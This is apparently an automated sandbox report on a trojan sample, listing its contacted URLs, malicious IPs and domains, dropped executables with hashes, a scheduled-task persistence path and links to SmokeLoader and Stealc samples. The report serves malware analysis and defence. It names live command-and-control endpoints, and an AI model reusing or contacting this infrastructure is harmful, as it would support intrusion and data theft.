https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	explorer.exe, 00000001.00000000.1765272332.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.dr	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000001.00000000.1768511521.000000000C975000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1768511521.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.x-ways.net/forensics/x-tensions.html	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.dr	false	URL Reputation: safe	unknown
https://word.office.com	explorer.exe, 00000001.00000000.1768511521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.x-ways.net/winhex/subscribe	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1765272332.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.x-ways.net/forensics/x-tensions.htmlf	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.158/ws	svchost015.exe, 00000008.00000002.2317202796.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/Vh5j3k	explorer.exe, 00000001.00000000.1765272332.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.dr	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?&	explorer.exe, 00000001.00000000.1766706025.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.158/e96ea2db21fa9a1b.phpg	svchost015.exe, 00000008.00000002.2317202796.0000000000D03000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.dr	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.dr	false	URL Reputation: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000001.00000000.1768511521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.158/e96ea2db21fa9a1b.phpm	svchost015.exe, 00000008.00000002.2317202796.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000001.00000000.1765272332.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.msn.com/	explorer.exe, 00000001.00000000.1766706025.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1768511521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.158i	svchost015.exe, 00000008.00000002.2317202796.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.x-ways.net/winhex/license	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	false	Avira URL Cloud: safe	unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.202.233.158	unknown	Russian Federation	9009	M247GB	true
191.96.144.157	free.cdn.hstgr.net	Chile	138968	RAINBOWIDC-AS-APrainbownetworklimitedJP	true
102.189.104.201	epohe.ru	Egypt	24835	RAYA-ASEG	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502849
Start date and time:	2024-09-02 11:41:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	e0OOofAl0S.exe renamed because original name is a hash value
Original Sample Name:	bdaeb131caed57083370b0c24ed030eb.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/4@9/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 46 Number of non-executed functions: 12
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:42:23	API Interceptor	470482x Sleep call for process: explorer.exe modified
10:42:24	Task Scheduler	Run new task: Firefox Default Browser Agent 894AECB0EB4ADF69 path: C:\Users\user\AppData\Roaming\busaafd

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.202.233.158	oZB7n3wuNk.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	mLn7GEEpuS.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	V6n3oygctH.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	91.202.233.158/e96ea2db21fa9a1b.php
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	91.202.233.158/e96ea2db21fa9a1b.php
191.96.144.157	npp.8.5.6.Installer.x64.exe	Get hash	malicious	Mars Stealer, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
epohe.ru	oZB7n3wuNk.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	2.185.214.11
	mLn7GEEpuS.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	175.119.10.231
	V6n3oygctH.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	211.181.24.132
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	105.155.13.153
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	185.12.79.25
free.cdn.hstgr.net	oZB7n3wuNk.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	84.32.84.152
	mLn7GEEpuS.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	185.77.97.68
	V6n3oygctH.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	84.32.84.249
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	84.32.84.88
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	84.32.84.144
	https://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html#asa@aan.pt	Get hash	malicious	Unknown	Browse	154.62.105.236
	https://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html%23e.szejgis@arlen.com.pl&c=E%2C10%2CGElLHQ3V9C4dUNBFMZt1mVRH2LpMhvMQrmpyxCta58errD7FQTDbxAt4Y5cCMR6WJVxZVMHk4h8%2BUN47&typo=1&know=0	Get hash	malicious	Unknown	Browse	84.32.84.212

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
M247GB	oZB7n3wuNk.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	91.202.233.158
	mLn7GEEpuS.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	91.202.233.158
	V6n3oygctH.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	91.202.233.158
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	91.202.233.158
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	91.202.233.158
	firmware.arm-linux-gnueabihf.elf	Get hash	malicious	Unknown	Browse	172.111.253.69
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	158.46.140.117
	OFFER-INQUIRY.jar	Get hash	malicious	STRRAT	Browse	37.120.199.54
	http://stream.crichd.vip/update/sscricket.php	Get hash	malicious	Unknown	Browse	38.132.109.126
	1724161253.9014926.dll	Get hash	malicious	Unknown	Browse	172.86.67.94
RAYA-ASEG	sora.ppc.elf	Get hash	malicious	Unknown	Browse	41.69.118.216
	firmware.i686.elf	Get hash	malicious	Unknown	Browse	41.69.184.192
	firmware.sh4.elf	Get hash	malicious	Unknown	Browse	197.133.173.134
	jew.arm7.elf	Get hash	malicious	Mirai	Browse	41.70.6.198
	YK85paB4RW.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	102.189.60.56
	82HD7ZgYPA.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	102.189.60.56
	Ltoj8zXMGf.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	102.189.60.56
	nullnet_load.arm7.elf	Get hash	malicious	Mirai	Browse	41.69.166.147
	nullnet_load.x86.elf	Get hash	malicious	Mirai	Browse	41.68.96.159
	b3astmode.x86.elf	Get hash	malicious	Mirai	Browse	102.189.120.25
RAINBOWIDC-AS-APrainbownetworklimitedJP	17217823862eb632fc7d34e74738954b9759cb00e549b63a7beb37128ab350b4d321af771d904.dat-decoded.exe	Get hash	malicious	Clipboard Hijacker, Quasar	Browse	191.96.79.79
	Comprovante-Pagamento_66a04578f18a3.js	Get hash	malicious	Clipboard Hijacker, Quasar	Browse	191.96.79.79
	SecuriteInfo.com.Win32.MalwareX-gen.20138.12701.exe	Get hash	malicious	Unknown	Browse	191.96.92.46
	SecuriteInfo.com.Win32.MalwareX-gen.20138.12701.exe	Get hash	malicious	Unknown	Browse	191.96.92.46
	xS8bwPQjO2.elf	Get hash	malicious	Mirai	Browse	181.214.84.236
	jql.jar	Get hash	malicious	Unknown	Browse	191.96.144.23
	https://royal-visit.com/	Get hash	malicious	Unknown	Browse	191.96.144.88
	file.exe	Get hash	malicious	FormBook	Browse	191.96.144.210
	file.exe	Get hash	malicious	FormBook	Browse	191.96.144.172
	http://shortens.me	Get hash	malicious	Unknown	Browse	191.96.144.79

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	http://10eurodisconto.com?rid=iVbb6Xl	Get hash	malicious	Unknown	Browse	191.96.144.157
	EiTkH53St5.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	191.96.144.157
	oZB7n3wuNk.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	191.96.144.157
	NeJp3E5Y5s.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	191.96.144.157
	5QfB8N2Jte.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	191.96.144.157
	x6N3TgPQvm.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	191.96.144.157
	mth9UWp36C.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	191.96.144.157
	mLisubeK3B.exe	Get hash	malicious	LummaC	Browse	191.96.144.157
	4BPdl1loHY.exe	Get hash	malicious	LummaC	Browse	191.96.144.157
	7IMcMa3pcr.exe	Get hash	malicious	LummaC	Browse	191.96.144.157

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\svchost015.exe	oZB7n3wuNk.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse
	mLn7GEEpuS.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse
	V6n3oygctH.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse
	ACGPhnMVxb.exe	Get hash	malicious	CryptOne, RHADAMANTHYS	Browse
	2eqt27LXwV.exe	Get hash	malicious	CryptOne, RHADAMANTHYS	Browse
	uxx8jvvSHl.exe	Get hash	malicious	LummaC, CryptOne	Browse
	1wM0OWBdv5.exe	Get hash	malicious	LummaC, CryptOne	Browse
	1wM0OWBdv5.exe	Get hash	malicious	LummaC, CryptOne	Browse
C:\Users\user\AppData\Local\Temp\D931.exe	oZB7n3wuNk.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse
	mLn7GEEpuS.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse
	V6n3oygctH.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\D931.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	3639176
Entropy (8bit):	7.398157669285365
Encrypted:	false
SSDEEP:	98304:H+sv/t4BT7/Z/U6NVQFamv1oOgEoYYkTZ9:H+it4x7RcsmFxv+OgEoYvTZ9
MD5:	17D51083CCB2B20074B1DC2CAC5BEA36
SHA1:	0A046864AD4304F63DBDE5AC14D3DC05CFB48D46
SHA-256:	681EEECECD77EB1433111641C33C8424EAF2C1265E2D4A7E4D6F023865FB5D94
SHA-512:	7DA8A2FD0321231C17FDDF414BF1D5A03D71DBC619F68958FF1D167003F972920F0F3C830B8A25AA715DF4FCC044D88D739B6EAB115A5B0B0A53852A70F4238A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Joe Sandbox View:	Filename: oZB7n3wuNk.exe, Detection: malicious, Browse Filename: mLn7GEEpuS.exe, Detection: malicious, Browse Filename: V6n3oygctH.exe, Detection: malicious, Browse Filename: h8jGj6Qe78.exe, Detection: malicious, Browse Filename: h8jGj6Qe78.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................H....2......V.......`....@...........................7.......7..........@............................... ...P...v1..........f7..!......Dd..................................................................................CODE....`F.......H.................. ..`DATA....d....`.......L..............@...BSS.....Q............f...................idata... ......."...f..............@....tls.....................................rdata..............................@..P.reloc..Dd.......f..................@..P.rsrc....v1..P...v1.................@..P..............7......f7.............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\svchost015.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\D931.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2990472
Entropy (8bit):	6.459856200541649
Encrypted:	false
SSDEEP:	49152:/INqIwJA7BYAzLOhHpB63X4oQaM35DhnSYf7bPZcYsO5+th1:wNqC7BZEHSQz5DhnSy7ujL
MD5:	B826DD92D78EA2526E465A34324EBEEA
SHA1:	BF8A0093ACFD2EB93C102E1A5745FB080575372E
SHA-256:	7824B50ACDD144764DAC7445A4067B35CF0FEF619E451045AB6C1F54F5653A5B
SHA-512:	1AC4B731B9B31CABF3B1C43AEE37206AEE5326C8E786ABE2AB38E031633B778F97F2D6545CF745C3066F3BD47B7AAF2DED2F9955475428100EAF271DD9AEEF17
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:	Filename: oZB7n3wuNk.exe, Detection: malicious, Browse Filename: mLn7GEEpuS.exe, Detection: malicious, Browse Filename: V6n3oygctH.exe, Detection: malicious, Browse Filename: h8jGj6Qe78.exe, Detection: malicious, Browse Filename: h8jGj6Qe78.exe, Detection: malicious, Browse Filename: ACGPhnMVxb.exe, Detection: malicious, Browse Filename: 2eqt27LXwV.exe, Detection: malicious, Browse Filename: uxx8jvvSHl.exe, Detection: malicious, Browse Filename: 1wM0OWBdv5.exe, Detection: malicious, Browse Filename: 1wM0OWBdv5.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....\"f..................#.........l.#.......#...@..........................p1.....?.-...`...(..@...........................p&.l3....(...............-..!....................................&.....................................................CODE......#.......#................. ..`DATA....0.....#.......#.............@...BSS...........$......\$..................idata..l3...p&..4...\$.............@....tls....\|.....&.......$..................rdata........&.......$.............@..P.reloc.......&.......$.............@..P.rsrc.........(.......$.............@..P.............p1......,/.............@..P........................................................................................................................................

C:\Users\user\AppData\Roaming\busaafd

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	221696
Entropy (8bit):	6.520221953543134
Encrypted:	false
SSDEEP:	3072:+t7l9Bx/d/vBKjcwALZSpjMiWShrJYhdd/iPga9//qZXXxPrd:ABx/d/vBKjcw0IllYhDVgqZX
MD5:	BDAEB131CAED57083370B0C24ED030EB
SHA1:	C4A00FC122D2015D41C0CF38E00A4711AE05D66D
SHA-256:	0923186058B76B52069AF9FD282AF6C98766179CBDD524E4D941E0BF44802781
SHA-512:	F1B68CB0A01A3771D46D3C9A66823F2E0E93461ED8ECAB18F807654FC108B14137980DDC637DB1F5B66F74BBA86D9929692093CCBAB9E6A2072FAB9AAE904501
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qX.n59.=59.=59.=ZOl=/9.=ZOY='9.=ZOm=P9.=<AT=69.=59.=\9.=ZOh=49.=ZO]=49.=ZOZ=49.=Rich59.=........................PE..L...p.4d..........................................@.................................9k..........................................(....P..xy..............................................................................t............................text...O........................... ..`.rdata..D&.......(..................@..@.data...`a....... ..................@....rsrc...xy...P...z..................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\busaafd:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.520221953543134
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	e0OOofAl0S.exe
File size:	221'696 bytes
MD5:	bdaeb131caed57083370b0c24ed030eb
SHA1:	c4a00fc122d2015d41c0cf38e00a4711ae05d66d
SHA256:	0923186058b76b52069af9fd282af6c98766179cbdd524e4d941e0bf44802781
SHA512:	f1b68cb0a01a3771d46d3c9a66823f2e0e93461ed8ecab18f807654fc108b14137980ddc637db1f5b66f74bba86d9929692093ccbab9e6a2072fab9aae904501
SSDEEP:	3072:+t7l9Bx/d/vBKjcwALZSpjMiWShrJYhdd/iPga9//qZXXxPrd:ABx/d/vBKjcw0IllYhDVgqZX
TLSH:	B1246C10F1E39026EDA647755930CAA11D3ABCF2EE7D819F7254FA2F19B32D0CA15722
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qX.n59.=59.=59.=ZOl=/9.=ZOY='9.=ZOm=P9.=<AT=69.=59.=\9.=ZOh=49.=ZO]=49.=ZOZ=49.=Rich59.=........................PE..L...p.4d...

File Icon


Icon Hash:	351a111212931009

Static PE Info

General

Entrypoint:	0x401abc
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6434ED70 [Tue Apr 11 05:17:36 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	371f652fdd8e6836c241a37f6252659c

Entrypoint Preview

Instruction
call 00007F5A50BD93A6h
jmp 00007F5A50BD4E7Eh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0041FB10h], eax
mov dword ptr [0041FB0Ch], ecx
mov dword ptr [0041FB08h], edx
mov dword ptr [0041FB04h], ebx
mov dword ptr [0041FB00h], esi
mov dword ptr [0041FAFCh], edi
mov word ptr [0041FB28h], ss
mov word ptr [0041FB1Ch], cs
mov word ptr [0041FAF8h], ds
mov word ptr [0041FAF4h], es
mov word ptr [0041FAF0h], fs
mov word ptr [0041FAECh], gs
pushfd
pop dword ptr [0041FB20h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0041FB14h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0041FB18h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0041FB24h], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0041FA60h], 00010001h
mov eax, dword ptr [0041FB18h]
mov dword ptr [0041FA14h], eax
mov dword ptr [0041FA08h], C0000409h
